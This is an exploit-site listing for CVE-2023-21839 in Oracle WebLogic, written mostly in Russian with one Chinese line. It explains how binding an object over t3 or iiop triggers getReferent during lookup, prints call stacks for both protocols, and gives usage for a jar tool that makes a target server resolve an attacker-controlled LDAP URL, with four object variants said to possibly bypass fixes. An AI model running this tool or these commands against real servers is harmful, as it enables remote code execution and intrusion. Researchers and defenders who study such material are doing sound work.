Sploitus

Exploit for CVE-2023-21839

kitploit · 2026-08-27

Exploit Code

MARKDOWN74 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-FIREBASKY-CVE-2023-21839
# CVE-2023-21839

## Анализ

Уязвимость возникает из-за того, что после привязки объекта через протоколы t3 или iiop при вызове методов lookup или list запускается метод getReferent привязанного объекта.

![image-20230120143023196](https://assets.kitploit.com/production/public/readmes/36051/d747afc1d127c4ff98f3ac23b0301e0cf59e8e95c5fbf7e5ed17d22d441e9f2d.png)

Стек вызовов для протокола t3:

root@kitploit:~
    
    
    getObjectInstance:96, WLNamingManager (weblogic.jndi.internal)
    resolveObject:377, ServerNamingNode (weblogic.jndi.internal)
    resolveObject:856, BasicNamingNode (weblogic.jndi.internal)
    lookup:209, BasicNamingNode (weblogic.jndi.internal)
    invoke:-1, RootNamingNode_WLSkel (weblogic.jndi.internal)
    invoke:667, BasicServerRef (weblogic.rmi.internal)
    invoke:230, ClusterableServerRef (weblogic.rmi.cluster)
    run:522, BasicServerRef$1 (weblogic.rmi.internal)
    doAs:363, AuthenticatedSubject (weblogic.security.acl.internal)
    runAs:146, SecurityManager (weblogic.security.service)
    handleRequest:518, BasicServerRef (weblogic.rmi.internal)
    run:118, WLSExecuteRequest (weblogic.rmi.internal.wls)
    execute:256, ExecuteThread (weblogic.work)
    run:221, ExecuteThread (weblogic.work)
    

Стек вызовов для протокола iiop:

root@kitploit:~
    
    
    getObjectInstance:96, WLNamingManager (weblogic.jndi.internal)
    resolveObject:377, ServerNamingNode (weblogic.jndi.internal)
    resolveObject:856, BasicNamingNode (weblogic.jndi.internal)
    lookup:209, BasicNamingNode (weblogic.jndi.internal)
    lookup:254, WLEventContextImpl (weblogic.jndi.internal)
    lookup:412, WLContextImpl (weblogic.jndi.internal)
    lookup:411, InitialContext (javax.naming)
    resolveObject:454, NamingContextImpl (weblogic.corba.cos.naming)
    resolve_any:360, NamingContextImpl (weblogic.corba.cos.naming)
    _invoke:108, _NamingContextAnyImplBase (weblogic.corba.cos.naming)
    invoke:249, CorbaServerRef (weblogic.corba.idl)
    invoke:230, ClusterableServerRef (weblogic.rmi.cluster)
    run:522, BasicServerRef$1 (weblogic.rmi.internal)
    doAs:363, AuthenticatedSubject (weblogic.security.acl.internal)
    runAs:146, SecurityManager (weblogic.security.service)
    handleRequest:518, BasicServerRef (weblogic.rmi.internal)
    run:118, WLSExecuteRequest (weblogic.rmi.internal.wls)
    execute:256, ExecuteThread (weblogic.work)
    run:221, ExecuteThread (weblogic.work)
    

В ходе недолгого анализа были обнаружены другие объекты, которые также могут вызывать срабатывание.

## Инструмент

root@kitploit:~
    
    
    java -jar CVE-2023-21839.jar obj 127.0.0.1 7001 ldap://vps:port/xxx
    obj 选项支持4种 maybe can bypass!
    foreignOpaqueRef,foreignOpaqueRef2,AggtableOpaqueRef,linkRef
    
    eg:
    java -jar CVE-2023-21839.jar foreignOpaqueRef 127.0.0.1 7001 ldap://vps:port/xxx
    

Решена проблема работы iiop по сети net.

https://firebasky.github.io/2023/01/18/Solve-the-problem-of-iiop-using-net-network-in-webLogic/